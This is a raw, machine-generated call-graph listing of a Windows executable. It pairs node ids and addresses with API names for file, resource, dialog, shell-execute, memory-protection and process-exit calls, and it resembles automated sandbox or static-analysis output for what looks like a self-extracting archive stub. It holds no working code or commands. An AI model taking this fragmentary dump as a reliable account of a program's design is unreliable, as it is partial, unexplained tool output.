FreeLibrary 23710->23707 23711->23712 23712->23707 23712->23710 23713->23696 23714->23648 23814 eec50 23715->23814 23718 e0888 GetProcAddress 23721 e08b9 GetProcAddress 23718->23721 23722 e08a1 23718->23722 23719 e08e7 23720 e0c14 GetModuleFileNameW 23719->23720 23825 f75fb 42 API calls __vsnwprintf_l 23719->23825 23731 e0c32 23720->23731 23724 e08cb 23721->23724 23722->23721 23724->23719 23725 e0b54 23725->23720 23726 e0b5f GetModuleFileNameW CreateFileW 23725->23726 23727 e0b8f SetFilePointer 23726->23727 23728 e0c08 CloseHandle 23726->23728 23727->23728 23729 e0b9d ReadFile 23727->23729 23728->23720 23729->23728 23732 e0bbb 23729->23732 23734 e0c94 GetFileAttributesW 23731->23734 23735 e0cac 23731->23735 23737 e0c5d CompareStringW 23731->23737 23816 db146 23731->23816 23819 e081b 23731->23819 23732->23728 23736 e081b 2 API calls 23732->23736 23734->23731 23734->23735 23738 e0cb7 23735->23738 23740 e0cec 23735->23740 23736->23732 23737->23731 23741 e0cd0 GetFileAttributesW 23738->23741 23743 e0ce8 23738->23743 23739 e0dfb 23763 ea64d GetCurrentDirectoryW 23739->23763 23740->23739 23742 db146 GetVersionExW 23740->23742 23741->23738 23741->23743 23744 e0d06 23742->23744 23743->23740 23745 e0d0d 23744->23745 23746 e0d73 23744->23746 23748 e081b 2 API calls 23745->23748 23747 d4092 _swprintf 51 API calls 23746->23747 23749 e0d9b AllocConsole 23747->23749 23750 e0d17 23748->23750 23751 e0da8 GetCurrentProcessId AttachConsole 23749->23751 23752 e0df3 ExitProcess 23749->23752 23753 e081b 2 API calls 23750->23753 23830 f3e13 23751->23830 23755 e0d21 23753->23755 23826 de617 23755->23826 23756 e0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23756->23752 23759 d4092 _swprintf 51 API calls 23760 e0d4f 23759->23760 23761 de617 53 API calls 23760->23761 23762 e0d5e 23761->23762 23762->23752 23763->23518 23765 e081b 2 API calls 23764->23765 23766 eac2a OleInitialize 23765->23766 23767 eac4d GdiplusStartup SHGetMalloc 23766->23767 23767->23520 23771 ec5ce 23768->23771 23769 ec6e4 23769->23528 23769->23529 23770 e1fac CharUpperW 23770->23771 23771->23769 23771->23770 23855 df3fa 82 API calls 2 library calls 23771->23855 23774 eec50 23773->23774 23775 edbeb SetEnvironmentVariableW 23774->23775 23777 edc0e 23775->23777 23776 edc36 23776->23523 23777->23776 23778 edc2a SetEnvironmentVariableW 23777->23778 23778->23776 23856 d4065 23779->23856 23782 eb6dd LoadBitmapW 23783 eb6fe 23782->23783 23784 eb70b GetObjectW 23782->23784 23924 ea6c2 FindResourceW 23783->23924 23786 eb71a 23784->23786 23919 ea5c6 23786->23919 23789 eb770 23801 dda42 23789->23801 23791 eb74c 23940 ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23791->23940 23792 ea6c2 13 API calls 23794 eb73d 23792->23794 23794->23791 23796 eb743 DeleteObject 23794->23796 23795 eb754 23941 ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23795->23941 23796->23791 23798 eb75d 23942 ea80c 8 API calls 23798->23942 23800 eb764 DeleteObject 23800->23789 23953 dda67 23801->23953 23806 e90b7 24086 eeb38 23806->24086 23810 eacab GdiplusShutdown CoUninitialize 23809->23810 23810->23558 23812->23548 23813->23557 23815 e086d GetModuleHandleW 23814->23815 23815->23718 23815->23719 23817 db15a GetVersionExW 23816->23817 23818 db196 23816->23818 23817->23818 23818->23731 23820 eec50 23819->23820 23821 e0828 GetSystemDirectoryW 23820->23821 23822 e085e 23821->23822 23823 e0840 23821->23823 23822->23731 23824 e0851 LoadLibraryW 23823->23824 23824->23822 23825->23725 23827 de627 23826->23827 23832 de648 23827->23832 23831 f3e1b 23830->23831 23831->23756 23831->23831 23838 dd9b0 23832->23838 23835 de66b LoadStringW 23836 de645 23835->23836 23837 de682 LoadStringW 23835->23837 23836->23759 23837->23836 23843 dd8ec 23838->23843 23840 dd9cd 23841 dd9e2 23840->23841 23851 dd9f0 26 API calls 23840->23851 23841->23835 23841->23836 23844 dd904 23843->23844 23850 dd984 _strncpy 23843->23850 23846 dd928 23844->23846 23852 e1da7 WideCharToMultiByte 23844->23852 23849 dd959 23846->23849 23853 de5b1 50 API calls __vsnprintf 23846->23853 23854 f6159 26 API calls 3 library calls 23849->23854 23850->23840 23851->23841 23852->23846 23853->23849 23854->23850 23855->23771 23857 d407c __vsnwprintf_l 23856->23857 23860 f5fd4 23857->23860 23863 f4097 23860->23863 23864 f40bf 23863->23864 23865 f40d7 23863->23865 23880 f91a8 20 API calls __dosmaperr 23864->23880 23865->23864 23867 f40df 23865->23867 23882 f4636 23867->23882 23869 f40c4 23881 f9087 26 API calls __cftof 23869->23881 23873 efbbc _ValidateLocalCookies 5 API calls 23875 d4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23873->23875 23874 f4167 23891 f49e6 51 API calls 4 library calls 23874->23891 23875->23782 23878 f4172 23892 f46b9 20 API calls _free 23878->23892 23879 f40cf 23879->23873 23880->23869 23881->23879 23883 f4653 23882->23883 23889 f40ef 23882->23889 23883->23889 23893 f97e5 GetLastError 23883->23893 23885 f4674 23913 f993a 38 API calls __fassign 23885->23913 23887 f468d 23914 f9967 38 API calls __fassign 23887->23914 23890 f4601 20 API calls 2 library calls 23889->23890 23890->23874 23891->23878 23892->23879 23894 f97fb 23893->23894 23895 f9801 23893->23895 23915 fae5b 11 API calls 2 library calls 23894->23915 23897 fb136 __dosmaperr 20 API calls 23895->23897 23898 f9850 SetLastError 23895->23898 23899 f9813 23897->23899 23898->23885 23901 f981b 23899->23901 23916 faeb1 11 API calls 2 library calls 23899->23916 23903 f8dcc _free 20 API calls 23901->23903 23902 f9830 23902->23901 23905 f9837 23902->23905 23904 f9821 23903->23904 23906 f985c SetLastError 23904->23906 23917 f9649 20 API calls __dosmaperr 23905->23917 23918 f8d24 38 API calls _abort 23906->23918 23908 f9842 23910 f8dcc _free 20 API calls 23908->23910 23912 f9849 23910->23912 23912->23898 23912->23906 23913->23887 23914->23889 23915->23895 23916->23902 23917->23908 23943 ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23919->23943 23921 ea5cd 23922 ea5d9 23921->23922 23944 ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23921->23944 23922->23789 23922->23791 23922->23792 23925 ea6e5 SizeofResource 23924->23925 23926 ea7d3 23924->23926 23925->23926 23927 ea6fc LoadResource 23925->23927 23926->23784 23926->23786 23927->23926 23928 ea711 LockResource 23927->23928 23928->23926 23929 ea722 GlobalAlloc 23928->23929 23929->23926 23930 ea73d GlobalLock 23929->23930 23931 ea7cc GlobalFree 23930->23931 23932 ea74c __InternalCxxFrameHandler 23930->23932 23931->23926 23933 ea754 CreateStreamOnHGlobal 23932->23933 23934 ea76c 23933->23934 23935 ea7c5 GlobalUnlock 23933->23935 23945 ea626 GdipAlloc 23934->23945 23935->23931 23938 ea79a GdipCreateHBITMAPFromBitmap 23939 ea7b0 23938->23939 23939->23935 23940->23795 23941->23798 23942->23800 23943->23921 23944->23922 23946 ea638 23945->23946 23947 ea645 23945->23947 23949 ea3b9 23946->23949 23947->23935 23947->23938 23947->23939 23950 ea3da GdipCreateBitmapFromStreamICM 23949->23950 23951 ea3e1 GdipCreateBitmapFromStream 23949->23951 23952 ea3e6 23950->23952 23951->23952 23952->23947 23954 dda75 __EH_prolog 23953->23954 23955 ddaa4 GetModuleFileNameW 23954->23955 23956 ddad5 23954->23956 23957 ddabe 23955->23957 23999 d98e0 23956->23999 23957->23956 23959 ddb31 24010 f6310 23959->24010 23962 de261 78 API calls 23965 ddb05 23962->23965 23964 ddb44 23966 f6310 26 API calls 23964->23966 23965->23959 23965->23962 23977 ddd4a 23965->23977 23974 ddb56 ___vcrt_InitializeCriticalSectionEx 23966->23974 23967 ddc85 23967->23977 24046 d9d70 81 API calls 23967->24046 23971 ddc9f ___std_exception_copy 23972 d9bd0 82 API calls 23971->23972 23971->23977 23975 ddcc8 ___std_exception_copy 23972->23975 23974->23967 23974->23977 24024 d9e80 23974->24024 24040 d9bd0 23974->24040 24045 d9d70 81 API calls 23974->24045 23975->23977 23994 ddcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 23975->23994 24047 e1b84 MultiByteToWideChar 23975->24047 24033 d959a 23977->24033 23978 de159 23982 de1de 23978->23982 24053 f8cce 26 API calls 2 library calls 23978->24053 23981 de16e 24054 f7625 26 API calls 2 library calls 23981->24054 23983 de214 23982->23983 23987 de261 78 API calls 23982->23987 23988 f6310 26 API calls 23983->23988 23985 de1c6 24055 de27c 78 API calls 23985->24055 23987->23982 23989 de22d 23988->23989 23990 f6310 26 API calls 23989->23990 23990->23977 23993 e1da7 WideCharToMultiByte 23993->23994 23994->23977 23994->23978 23994->23993 24048 de5b1 50 API calls __vsnprintf 23994->24048 24049 f6159 26 API calls 3 library calls 23994->24049 24050 f8cce 26 API calls 2 library calls 23994->24050 24051 f7625 26 API calls 2 library calls 23994->24051 24052 de27c 78 API calls 23994->24052 23997 de29e GetModuleHandleW FindResourceW 23998 dda55 23997->23998 23998->23806 24000 d98ea 23999->24000 24001 d994b CreateFileW 24000->24001 24002 d996c GetLastError 24001->24002 24005 d99bb 24001->24005 24056 dbb03 24002->24056 24004 d998c 24004->24005 24007 d9990 CreateFileW GetLastError 24004->24007 24006 d99ff 24005->24006 24008 d99e5 SetFileTime 24005->24008 24006->23965 24007->24005 24009 d99b5 24007->24009 24008->24006 24009->24005 24011 f6349 24010->24011 24012 f634d 24011->24012 24023 f6375 24011->24023 24060 f91a8 20 API calls __dosmaperr 24012->24060 24014 f6699 24016 efbbc _ValidateLocalCookies 5 API calls 24014->24016 24015 f6352 24061 f9087 26 API calls __cftof 24015->24061 24018 f66a6 24016->24018 24018->23964 24019 f635d 24020 efbbc _ValidateLocalCookies 5 API calls 24019->24020 24022 f6369 24020->24022 24022->23964 24023->24014 24062 f6230 5 API calls _ValidateLocalCookies 24023->24062 24025 d9ea5 24024->24025 24026 d9e92 24024->24026 24027 d9eb0 24025->24027 24029 d9eb8 SetFilePointer 24025->24029 24026->24027 24063 d6d5b 77 API calls 24026->24063 24027->23974 24029->24027 24030 d9ed4 GetLastError 24029->24030 24030->24027 24031 d9ede 24030->24031 24031->24027 24064 d6d5b 77 API calls 24031->24064 24034 d95be 24033->24034 24039 d95cf 24033->24039 24035 d95ca 24034->24035 24036 d95d1 24034->24036 24034->24039 24065 d974e 24035->24065 24070 d9620 24036->24070 24039->23997 24041 d9bdc 24040->24041 24043 d9be3 24040->24043 24041->23974 24043->24041 24044 d9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24043->24044 24085 d6d1a 77 API calls 24043->24085 24044->24043 24045->23974 24046->23971 24047->23994 24048->23994 24049->23994 24050->23994 24051->23994 24052->23994 24053->23981 24054->23985 24055->23982 24057 dbb10 _wcslen 24056->24057 24058 dbbb8 GetCurrentDirectoryW 24057->24058 24059 dbb39 _wcslen 24057->24059 24058->24059 24059->24004 24060->24015 24061->24019 24062->24023 24063->24025 24064->24027 24066 d9757 24065->24066 24067 d9781 24065->24067 24066->24067 24076 da1e0 24066->24076 24067->24039 24072 d964a 24070->24072 24073 d962c 24070->24073 24071 d9669 24071->24039 24072->24071 24084 d6bd5 76 API calls 24072->24084 24073->24072 24074 d9638 CloseHandle 24073->24074 24074->24072 24077 eec50 24076->24077 24078 da1ed DeleteFileW 24077->24078 24079 d977f 24078->24079 24080 da200 24078->24080 24079->24039 24081 dbb03 GetCurrentDirectoryW 24080->24081 24082 da214 24081->24082 24082->24079 24083 da218 DeleteFileW 24082->24083 24083->24079 24084->24071 24085->24043 24087 eeb3d ___std_exception_copy 24086->24087 24088 e90d6 24087->24088 24091 eeb59 24087->24091 24095 f7a5e 7 API calls 2 library calls 24087->24095 24088->23542 24090 ef5c9 24097 f238d RaiseException 24090->24097 24091->24090 24096 f238d RaiseException 24091->24096 24094 ef5e6 24095->24087 24096->24090 24097->24094 24099 f7ce1 _unexpected 24098->24099 24100 f7cfa 24099->24100 24101 f7ce8 24099->24101 24122 fac31 EnterCriticalSection 24100->24122 24134 f7e2f GetModuleHandleW 24101->24134 24104 f7ced 24104->24100 24135 f7e73 GetModuleHandleExW 24104->24135 24105 f7d9f 24123 f7ddf 24105->24123 24109 f7d76 24113 f7d8e 24109->24113 24117 f8a91 _abort 5 API calls 24109->24117 24111 f7dbc 24126 f7dee 24111->24126 24112 f7de8 24144 102390 5 API calls _ValidateLocalCookies 24112->24144 24118 f8a91 _abort 5 API calls 24113->24118 24117->24113 24118->24105 24119 f7d01 24119->24105 24119->24109 24143 f87e0 20 API calls _abort 24119->24143 24122->24119 24145 fac81 LeaveCriticalSection 24123->24145 24125 f7db8 24125->24111 24125->24112 24146 fb076 24126->24146 24129 f7e1c 24132 f7e73 _abort 8 API calls 24129->24132 24130 f7dfc GetPEB 24130->24129 24131 f7e0c GetCurrentProcess TerminateProcess 24130->24131 24131->24129 24133 f7e24 ExitProcess 24132->24133 24134->24104 24136 f7e9d GetProcAddress 24135->24136 24137 f7ec0 24135->24137 24140 f7eb2 24136->24140 24138 f7ecf 24137->24138 24139 f7ec6 FreeLibrary 24137->24139 24141 efbbc _ValidateLocalCookies 5 API calls 24138->24141 24139->24138 24140->24137 24142 f7cf9 24141->24142 24142->24100 24143->24109 24145->24125 24147 fb09b 24146->24147 24148 fb091 24146->24148 24149 fac98 __dosmaperr 5 API calls 24147->24149 24150 efbbc _ValidateLocalCookies 5 API calls 24148->24150 24149->24148 24151 f7df8 24150->24151 24151->24129 24151->24130 25437 eb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24152 ee5b1 24153 ee578 24152->24153 24155 ee85d 24153->24155 24181 ee5bb 24155->24181 24157 ee86d 24158 ee8ca 24157->24158 24161 ee8ee 24157->24161 24159 ee7fb DloadReleaseSectionWriteAccess 6 API calls 24158->24159 24160 ee8d5 RaiseException 24159->24160 24175 eeac3 24160->24175 24162 ee966 LoadLibraryExA 24161->24162 24163 eea95 24161->24163 24165 ee9c7 24161->24165 24167 ee9d9 24161->24167 24164 ee979 GetLastError 24162->24164 24162->24165 24190 ee7fb 24163->24190 24169 ee9a2 24164->24169 24178 ee98c 24164->24178 24165->24167 24168 ee9d2 FreeLibrary 24165->24168 24166 eea37 GetProcAddress 24166->24163 24171 eea47 GetLastError 24166->24171 24167->24163 24167->24166 24168->24167 24170 ee7fb DloadReleaseSectionWriteAccess 6 API calls 24169->24170 24172 ee9ad RaiseException 24170->24172 24173 eea5a 24171->24173 24172->24175 24173->24163 24176 ee7fb DloadReleaseSectionWriteAccess 6 API calls 24173->24176 24175->24153 24177 eea7b RaiseException 24176->24177 24179 ee5bb ___delayLoadHelper2@8 6 API calls 24177->24179 24178->24165 24178->24169 24180 eea92 24179->24180 24180->24163 24182 ee5ed 24181->24182 24183 ee5c7 24181->24183 24182->24157 24198 ee664 24183->24198 24185 ee5cc 24186 ee5e8 24185->24186 24201 ee78d 24185->24201 24206 ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24186->24206 24189 ee836 24189->24157 24191 ee82f 24190->24191 24192 ee80d 24190->24192 24191->24175 24193 ee664 DloadReleaseSectionWriteAccess 3 API calls 24192->24193 24195 ee812 24193->24195 24194 ee82a 24209 ee831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24194->24209 24195->24194 24196 ee78d DloadProtectSection 3 API calls 24195->24196 24196->24194 24207 ee5ee GetModuleHandleW GetProcAddress GetProcAddress 24198->24207 24200 ee669 24200->24185 24203 ee7a2 DloadProtectSection 24201->24203 24202 ee7a8 24202->24186 24203->24202 24204 ee7dd VirtualProtect 24203->24204 24208 ee6a3 VirtualQuery GetSystemInfo 24203->24208 24204->24202 24206->24189 24207->24200 24208->24204 24209->24191 25477 102bd0 VariantClear 25455 e62ca 123 API calls __InternalCxxFrameHandler 24350 edec2 24351 edecf 24350->24351 24352 de617 53 API calls 24351->24352 24353 ededc 24352->24353 24354 d4092 _swprintf 51 API calls 24353->24354 24355 edef1 SetDlgItemTextW 24354->24355 24358 eb568 PeekMessageW 24355->24358 24359 eb5bc 24358->24359 24360 eb583 GetMessageW 24358->24360 24361 eb5a8 TranslateMessage DispatchMessageW 24360->24361 24362 eb599 IsDialogMessageW 24360->24362 24361->24359 24362->24359 24362->24361 25439 eb5c0 100 API calls 25479 e77c0 118 API calls 25480 effc0 RaiseException _com_raise_error _com_error::_com_error 25456 f0ada 51 API calls 2 library calls 24458 d10d5 24463 d5abd 24458->24463 24464 d5ac7 __EH_prolog 24463->24464 24470 db505 24464->24470 24466 d5ad3 24476 d5cac GetCurrentProcess GetProcessAffinityMask 24466->24476 24471 db50f __EH_prolog 24470->24471 24477 df1d0 82 API calls 24471->24477 24473 db521 24478 db61e 24473->24478 24477->24473 24479 db630 __cftof 24478->24479 24482 e10dc 24479->24482 24485 e109e GetCurrentProcess GetProcessAffinityMask 24482->24485 24486 db597 24485->24486 24486->24466 24487 ee2d7 24489 ee1db 24487->24489 24488 ee85d ___delayLoadHelper2@8 14 API calls 24488->24489 24489->24488 25414 ef4d3 20 API calls 24493 ee1d1 14 API calls ___delayLoadHelper2@8 25481 fa3d0 21 API calls 2 library calls 25441 df1e8 FreeLibrary 24500 eeae7 24501 eeaf1 24500->24501 24502 ee85d ___delayLoadHelper2@8 14 API calls 24501->24502 24503 eeafe 24502->24503 25415 ef4e7 29 API calls _abort 24505 d13e1 84 API calls 2 library calls 24506 eb7e0 24507 eb7ea __EH_prolog 24506->24507 24674 d1316 24507->24674 24510 ebf0f 24739 ed69e 24510->24739 24511 eb82a 24513 eb89b 24511->24513 24514 eb838 24511->24514 24590 eb841 24511->24590 24520 eb92e GetDlgItemTextW 24513->24520 24521 eb8b1 24513->24521 24516 eb83c 24514->24516 24517 eb878 24514->24517 24526 de617 53 API calls 24516->24526 24516->24590 24528 eb95f KiUserCallbackDispatcher 24517->24528 24517->24590 24518 ebf2a SendMessageW 24519 ebf38 24518->24519 24522 ebf52 GetDlgItem SendMessageW 24519->24522 24523 ebf41 SendDlgItemMessageW 24519->24523 24520->24517 24524 eb96b 24520->24524 24525 de617 53 API calls 24521->24525 24757 ea64d GetCurrentDirectoryW 24522->24757 24523->24522 24529 eb980 GetDlgItem 24524->24529 24672 eb974 24524->24672 24532 eb8ce SetDlgItemTextW 24525->24532 24533 eb85b 24526->24533 24528->24590 24530 eb9b7 SetFocus 24529->24530 24531 eb994 SendMessageW SendMessageW 24529->24531 24535 eb9c7 24530->24535 24549 eb9e0 24530->24549 24531->24530 24536 eb8d9 24532->24536 24779 d124f SHGetMalloc 24533->24779 24534 ebf82 GetDlgItem 24538 ebf9f 24534->24538 24539 ebfa5 SetWindowTextW 24534->24539 24540 de617 53 API calls 24535->24540 24543 eb8e6 GetMessageW 24536->24543 24536->24590 24538->24539 24758 eabab GetClassNameW 24539->24758 24544 eb9d1 24540->24544 24541 ebe55 24545 de617 53 API calls 24541->24545 24547 eb8fd IsDialogMessageW 24543->24547 24543->24590 24780 ed4d4 24544->24780 24551 ebe65 SetDlgItemTextW 24545->24551 24547->24536 24554 eb90c TranslateMessage DispatchMessageW 24547->24554 24556 de617 53 API calls 24549->24556 24550 ec1fc SetDlgItemTextW 24550->24590 24555 ebe79 24551->24555 24554->24536 24557 de617 53 API calls 24555->24557 24559 eba17 24556->24559 24594 ebe9c _wcslen 24557->24594 24558 ebff0 24562 ec020 24558->24562 24566 de617 53 API calls 24558->24566 24564 d4092 _swprintf 51 API calls 24559->24564 24560 ec73f 97 API calls 24560->24558 24561 eb9d9 24684 da0b1 24561->24684 24573 ec73f 97 API calls 24562->24573 24618 ec0d8 24562->24618 24565 eba29 24564->24565 24568 ed4d4 16 API calls 24565->24568 24570 ec003 SetDlgItemTextW 24566->24570 24568->24561 24569 ec18b 24574 ec19d 24569->24574 24575 ec194 EnableWindow 24569->24575 24577 de617 53 API calls 24570->24577 24571 eba73 24690 eac04 SetCurrentDirectoryW 24571->24690 24572 eba68 GetLastError 24572->24571 24579 ec03b 24573->24579 24580 ec1ba 24574->24580 24798 d12d3 GetDlgItem EnableWindow 24574->24798 24575->24574 24576 ebeed 24583 de617 53 API calls 24576->24583 24581 ec017 SetDlgItemTextW 24577->24581 24584 ec04d 24579->24584 24615 ec072 24579->24615 24587 ec1e1 24580->24587 24598 ec1d9 SendMessageW 24580->24598 24581->24562 24582 eba87 24588 eba90 GetLastError 24582->24588 24589 eba9e 24582->24589 24583->24590 24796 e9ed5 32 API calls 24584->24796 24585 ec0cb 24595 ec73f 97 API calls 24585->24595 24587->24590 24599 de617 53 API calls 24587->24599 24588->24589 24592 ebb11 24589->24592 24600 ebaae GetTickCount 24589->24600 24601 ebb20 24589->24601 24592->24601 24603 ebd56 24592->24603 24593 ec1b0 24799 d12d3 GetDlgItem EnableWindow 24593->24799 24594->24576 24602 de617 53 API calls 24594->24602 24595->24618 24596 ec066 24596->24615 24598->24587 24609 eb862 24599->24609 24610 d4092 _swprintf 51 API calls 24600->24610 24605 ebcfb 24601->24605 24606 ebb39 GetModuleFileNameW 24601->24606 24607 ebcf1 24601->24607 24611 ebed0 24602->24611 24699 d12f1 GetDlgItem ShowWindow 24603->24699 24604 ec169 24797 e9ed5 32 API calls 24604->24797 24614 de617 53 API calls 24605->24614 24790 df28c 82 API calls 24606->24790 24607->24517 24607->24605 24609->24550 24609->24590 24617 ebac7 24610->24617 24619 d4092 _swprintf 51 API calls 24611->24619 24622 ebd05 24614->24622 24615->24585 24623 ec73f 97 API calls 24615->24623 24616 ebd66 24700 d12f1 GetDlgItem ShowWindow 24616->24700 24691 d966e 24617->24691 24618->24569 24618->24604 24625 de617 53 API calls 24618->24625 24619->24576 24620 ec188 24620->24569 24621 ebb5f 24626 d4092 _swprintf 51 API calls 24621->24626 24627 d4092 _swprintf 51 API calls 24622->24627 24628 ec0a0 24623->24628 24625->24618 24630 ebb81 CreateFileMappingW 24626->24630 24631 ebd23 24627->24631 24628->24585 24632 ec0a9 DialogBoxParamW 24628->24632 24629 ebd70 24633 de617 53 API calls 24629->24633 24635 ebbe3 GetCommandLineW 24630->24635 24667 ebc60 __InternalCxxFrameHandler 24630->24667 24644 de617 53 API calls 24631->24644 24632->24517 24632->24585 24636 ebd7a SetDlgItemTextW 24633->24636 24638 ebbf4 24635->24638 24701 d12f1 GetDlgItem ShowWindow 24636->24701 24637 ebaed 24641 ebaf4 GetLastError 24637->24641 24642 ebaff 24637->24642 24791 eb425 SHGetMalloc 24638->24791 24639 ebc6b ShellExecuteExW 24664 ebc88 24639->24664 24641->24642 24646 d959a 80 API calls 24642->24646 24648 ebd3d 24644->24648 24645 ebd8c SetDlgItemTextW GetDlgItem 24649 ebda9 GetWindowLongW SetWindowLongW 24645->24649 24650 ebdc1 24645->24650 24646->24592 24647 ebc10 24792 eb425 SHGetMalloc 24647->24792 24649->24650 24702 ec73f 24650->24702 24653 ebc1c 24793 eb425 SHGetMalloc 24653->24793 24656 ebccb 24656->24607 24660 ebce1 UnmapViewOfFile CloseHandle 24656->24660 24657 ec73f 97 API calls 24659 ebddd 24657->24659 24658 ebc28 24794 df3fa 82 API calls 2 library calls 24658->24794 24727 eda52 24659->24727 24660->24607 24663 ebc3f MapViewOfFile 24663->24667 24664->24656 24668 ebcb7 Sleep 24664->24668 24666 ec73f 97 API calls 24670 ebe03 24666->24670 24667->24639 24668->24656 24668->24664 24669 ebe2c 24795 d12d3 GetDlgItem EnableWindow 24669->24795 24670->24669 24673 ec73f 97 API calls 24670->24673 24672->24517 24672->24541 24673->24669 24675 d131f 24674->24675 24676 d1378 24674->24676 24677 d1385 24675->24677 24800 de2e8 62 API calls 2 library calls 24675->24800 24801 de2c1 GetWindowLongW SetWindowLongW 24676->24801 24677->24510 24677->24511 24677->24590 24680 d1341 24680->24677 24681 d1354 GetDlgItem 24680->24681 24681->24677 24682 d1364 24681->24682 24682->24677 24683 d136a SetWindowTextW 24682->24683 24683->24677 24685 da0bb 24684->24685 24686 da175 24685->24686 24687 da14c 24685->24687 24802 da2b2 24685->24802 24686->24571 24686->24572 24687->24686 24688 da2b2 8 API calls 24687->24688 24688->24686 24690->24582 24692 d9678 24691->24692 24693 d96d5 CreateFileW 24692->24693 24694 d96c9 24692->24694 24693->24694 24695 d971f 24694->24695 24696 dbb03 GetCurrentDirectoryW 24694->24696 24695->24637 24697 d9704 24696->24697 24697->24695 24698 d9708 CreateFileW 24697->24698 24698->24695 24699->24616 24700->24629 24701->24645 24703 ec749 __EH_prolog 24702->24703 24704 ebdcf 24703->24704 24705 eb314 ExpandEnvironmentStringsW 24703->24705 24704->24657 24714 ec780 _wcslen _wcsrchr 24705->24714 24707 eb314 ExpandEnvironmentStringsW 24707->24714 24708 eca67 SetWindowTextW 24708->24714 24711 f3e3e 22 API calls 24711->24714 24713 ec855 SetFileAttributesW 24716 ec90f GetFileAttributesW 24713->24716 24726 ec86f __cftof _wcslen 24713->24726 24714->24704 24714->24707 24714->24708 24714->24711 24714->24713 24719 ecc31 GetDlgItem SetWindowTextW SendMessageW 24714->24719 24722 ecc71 SendMessageW 24714->24722 24823 e1fbb CompareStringW 24714->24823 24824 ea64d GetCurrentDirectoryW 24714->24824 24826 da5d1 6 API calls 24714->24826 24827 da55a FindClose 24714->24827 24828 eb48e 76 API calls 2 library calls 24714->24828 24716->24714 24717 ec921 DeleteFileW 24716->24717 24717->24714 24720 ec932 24717->24720 24719->24714 24721 d4092 _swprintf 51 API calls 24720->24721 24723 ec952 GetFileAttributesW 24721->24723 24722->24714 24723->24720 24724 ec967 MoveFileW 24723->24724 24724->24714 24725 ec97f MoveFileExW 24724->24725 24725->24714 24726->24714 24726->24716 24825 db991 51 API calls 2 library calls 24726->24825 24728 eda5c __EH_prolog 24727->24728 24829 e0659 24728->24829 24730 eda8d 24833 d5b3d 24730->24833 24732 edaab 24837 d7b0d 24732->24837 24736 edafe 24853 d7b9e 24736->24853 24738 ebdee 24738->24666 24740 ed6a8 24739->24740 24741 ea5c6 4 API calls 24740->24741 24742 ed6ad 24741->24742 24743 ebf15 24742->24743 24744 ed6b5 GetWindow 24742->24744 24743->24518 24743->24519 24744->24743 24750 ed6d5 24744->24750 24745 ed6e2 GetClassNameW 25324 e1fbb CompareStringW 24745->25324 24747 ed76a GetWindow 24747->24743 24747->24750 24748 ed706 GetWindowLongW 24748->24747 24749 ed716 SendMessageW 24748->24749 24749->24747 24751 ed72c GetObjectW 24749->24751 24750->24743 24750->24745 24750->24747 24750->24748 25325 ea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24751->25325 24753 ed743 25326 ea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24753->25326 25327 ea80c 8 API calls 24753->25327 24756 ed754 SendMessageW DeleteObject 24756->24747 24757->24534 24759 eabcc 24758->24759 24765 eabf1 24758->24765 25328 e1fbb CompareStringW 24759->25328 24761 eabff 24766 eb093 24761->24766 24762 eabf6 SHAutoComplete 24762->24761 24763 eabdf 24764 eabe3 FindWindowExW 24763->24764 24763->24765 24764->24765 24765->24761 24765->24762 24767 eb09d __EH_prolog 24766->24767 24768 d13dc 84 API calls 24767->24768 24769 eb0bf 24768->24769 25329 d1fdc 24769->25329 24772 eb0eb 24775 d19af 128 API calls 24772->24775 24773 eb0d9 24774 d1692 86 API calls 24773->24774 24776 eb0e4 24774->24776 24778 eb10d __InternalCxxFrameHandler ___std_exception_copy 24775->24778 24776->24558 24776->24560 24777 d1692 86 API calls 24777->24776 24778->24777 24779->24609 24781 eb568 5 API calls 24780->24781 24782 ed4e0 GetDlgItem 24781->24782 24783 ed536 SendMessageW SendMessageW 24782->24783 24784 ed502 24782->24784 24785 ed572 24783->24785 24786 ed591 SendMessageW SendMessageW SendMessageW 24783->24786 24789 ed50d ShowWindow SendMessageW SendMessageW 24784->24789 24785->24786 24787 ed5e7 SendMessageW 24786->24787 24788 ed5c4 SendMessageW 24786->24788 24787->24561 24788->24787 24789->24783 24790->24621 24791->24647 24792->24653 24793->24658 24794->24663 24795->24672 24796->24596 24797->24620 24798->24593 24799->24580 24800->24680 24801->24677 24803 da2bf 24802->24803 24804 da2e3 24803->24804 24805 da2d6 CreateDirectoryW 24803->24805 24806 da231 3 API calls 24804->24806 24805->24804 24809 da316 24805->24809 24807 da2e9 24806->24807 24808 da329 GetLastError 24807->24808 24811 dbb03 GetCurrentDirectoryW 24807->24811 24810 da325 24808->24810 24809->24810 24815 da4ed 24809->24815 24810->24685 24813 da2ff 24811->24813 24813->24808 24814 da303 CreateDirectoryW 24813->24814 24814->24808 24814->24809 24816 eec50 24815->24816 24817 da4fa SetFileAttributesW 24816->24817 24818 da53d 24817->24818 24819 da510 24817->24819 24818->24810 24820 dbb03 GetCurrentDirectoryW 24819->24820 24821 da524 24820->24821 24821->24818 24822 da528 SetFileAttributesW 24821->24822 24822->24818 24823->24714 24824->24714 24825->24726 24826->24714 24827->24714 24828->24714 24830 e0666 _wcslen 24829->24830 24857 d17e9 24830->24857 24832 e067e 24832->24730 24834 e0659 _wcslen 24833->24834 24835 d17e9 78 API calls 24834->24835 24836 e067e 24835->24836 24836->24732 24838 d7b17 __EH_prolog 24837->24838 24874 dce40 24838->24874 24840 d7b32 24841 eeb38 8 API calls 24840->24841 24842 d7b5c 24841->24842 24880 e4a76 24842->24880 24845 d7c7d 24846 d7c87 24845->24846 24848 d7cf1 24846->24848 24909 da56d 24846->24909 24851 d7d50 24848->24851 24887 d8284 24848->24887 24849 d7d92 24849->24736 24851->24849 24915 d138b 74 API calls 24851->24915 24854 d7bac 24853->24854 24855 d7bb3 